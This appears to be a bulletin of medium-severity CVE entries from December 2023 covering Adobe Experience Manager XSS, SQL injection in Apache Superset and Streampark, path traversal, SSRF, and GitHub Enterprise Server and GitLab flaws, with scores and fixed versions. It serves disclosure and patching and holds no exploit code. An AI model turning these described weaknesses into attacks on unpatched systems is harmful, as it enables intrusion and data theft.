adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48592
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48593
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48594
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48595
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48596
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48597
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48598
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48599
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48600
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48601
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48602
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48603
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48604
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48605
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48606
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48607
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48609
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48610
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48611
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48612
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48613
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48614
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48615
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48616
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48617
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48618
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48619
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48620
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48621
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48622
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48623
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48624
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-20 5.4 CVE-2023-51459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-20 5.4 CVE-2023-51461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-20 5.4 CVE-2023-51462
psirt@adobe.com
aiven-open — journalpump journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0. 2023-12-21 6.5 CVE-2023-51390
security-advisories@github.com
ansible — ansible An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path. 2023-12-18 6.3 CVE-2023-5115
secalert@redhat.com
apache — streampark In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like ‘%jobName%’. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. 2023-12-15 4.9 CVE-2023-30867
security@apache.org
apache — superset Uncontrolled resource consumption can be triggered by an authenticated attacker who uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1. 2023-12-19 6.5 CVE-2023-46104
security@apache.org
apache — superset A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue. 2023-12-19 6.5 CVE-2023-49736
security@apache.org
apple — macos HCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. 2023-12-21 5.3 CVE-2023-45703
psirt@hcl.com
automad — automad A vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7037
cna@vuldb.com
automad — automad A vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 4.7 CVE-2023-7036
cna@vuldb.com
automad — automad A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 4.3 CVE-2023-7038
cna@vuldb.com
aveva — edge An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses. 2023-12-16 5.3 CVE-2021-42794
cve@mitre.org
aws — aws-sdk-php AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. 2023-12-22 6 CVE-2023-51651
security-advisories@github.com
bazarr — bazarr Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. 2023-12-15 5.3 CVE-2023-50266
security-advisories@github.com
beijing_baichuo — s210 A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688. 2023-12-21 6.3 CVE-2023-7039
cna@vuldb.com
bosch — building_integration_system_video_engine Improper handling of malformed API answer packets sent to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability, an attacker has to replace an existing API server, e.g. through Man-in-the-Middle attacks. 2023-12-18 5.9 CVE-2023-35867
psirt@bosch.com
bosch — cpp14_firmware An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet. 2023-12-18 5.3 CVE-2022-41677
psirt@bosch.com
cacti — cacti Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability – execution of arbitrary javascript code in the attacked user’s browser. This issue has been patched in version 1.2.26. 2023-12-22 6.1 CVE-2023-49086
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. 2023-12-22 6.1 CVE-2023-49088
security-advisories@github.com
cacti — cacti Cacti is an open source operational monitoring and fault management framework. A reflected cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php`. When uploading an XML template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains the unfiltered XML template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. 2023-12-22 5.4 CVE-2023-50250
security-advisories@github.com
clear — clearml_server Cross-site Scripting (XSS) – Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (i.e., when a malicious party already has access to the internal network and to a user’s ClearML login credentials). 2023-12-18 5.4 CVE-2023-6778
security@huntr.dev
clickhouse — clickhouse ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited. 2023-12-21 5.9 CVE-2023-48298
security-advisories@github.com
codelyfe — stupid_simple_cms A vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: ‘../filedir’. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability. 2023-12-21 5.4 CVE-2023-7041
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability. 2023-12-21 4.3 CVE-2023-7040
cna@vuldb.com
corveda — phpsandbox A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability. 2023-12-19 4.3 CVE-2014-125107
cna@vuldb.com
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information. 2023-12-15 6.5 CVE-2023-48374
twcert@cert.org.tw
dell — cpg_bios Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. 2023-12-22 6.7 CVE-2023-39251
security_alert@emc.com
dell — emc_networker Dell NetWorker Virtual Edition versions 19.8 and below contains the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure. 2023-12-18 5.3 CVE-2023-28053
security_alert@emc.com
dfir-iris — iris-web Iris is a web collaborative platform aiming to help incident responders share technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker needs to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available. 2023-12-22 4.6 CVE-2023-50712
security-advisories@github.com
dfirkuiper — kuiper A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability. 2023-12-18 5.9 CVE-2023-6908
cna@vuldb.com
efacec — uc_500e An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application. 2023-12-20 6.3 CVE-2023-50703
ics-cert@hq.dhs.gov
efacec — uc_500e An attacker could create malicious requests to obtain sensitive information about the web server. 2023-12-20 5.3 CVE-2023-50705
ics-cert@hq.dhs.gov
efacec — uc_500e An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users. 2023-12-20 4.3 CVE-2023-50704
ics-cert@hq.dhs.gov
efacec — uc_500e A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens. 2023-12-20 4.1 CVE-2023-50706
ics-cert@hq.dhs.gov
enterprise_server — enterprise_server Improper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the “Get a check run” API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.0. 2023-12-21 5.3 CVE-2023-46646
product-cna@github.com
enterprise_server — enterprise_server An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 4.9 CVE-2023-51379
product-cna@github.com
enterprise_server — enterprise_server Improper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 6.5 CVE-2023-6804
product-cna@github.com
enterprise_server — enterprise_server A race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-21 5.8 CVE-2023-6803
product-cna@github.com
ethex — contracts A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271. 2023-12-19 4.3 CVE-2019-25157
cna@vuldb.com
gallagher — command_centre Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior. 2023-12-18 5.4 CVE-2023-23570
disclosures@gallagher.com
gallagher — command_centre_diagnostics_service A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)). 2023-12-18 5.5 CVE-2023-46686
disclosures@gallagher.com
gallagher — command_centre_server Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior. 2023-12-18 4.3 CVE-2023-23576
disclosures@gallagher.com
gallagher — command_centre_server An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all versions of 8.50 and prior. 2023-12-18 4.3 CVE-2023-23584
disclosures@gallagher.com
gallagher — controller_7000 Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)). 2023-12-18 6.8 CVE-2023-6355
disclosures@gallagher.com
getsentry — symbolicator Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. 2023-12-22 4.3 CVE-2023-51451
security-advisories@github.com
github — enterprise_server A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 6.8 CVE-2023-46645
product-cna@github.com
github — enterprise_server A race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 6.3 CVE-2023-46649
product-cna@github.com
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. 2023-12-15 6.5 CVE-2023-6051
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names, leading to incorrect representation in the UI. 2023-12-15 5.7 CVE-2023-5512
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. 2023-12-15 4.3 CVE-2023-5061
cve@gitlab.com
gradio — gradio Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitrary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. 2023-12-22 5.6 CVE-2023-51449
security-advisories@github.com
grails — grails Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0. 2023-12-21 6.5 CVE-2023-46131
security-advisories@github.com
